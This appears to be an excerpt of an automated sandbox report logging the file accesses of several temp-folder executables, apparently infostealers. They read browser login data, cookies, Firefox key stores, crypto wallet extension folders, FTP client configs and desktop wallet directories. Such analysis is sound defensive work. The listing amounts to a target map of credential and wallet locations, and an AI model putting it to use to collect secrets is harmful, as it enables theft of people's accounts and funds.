                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
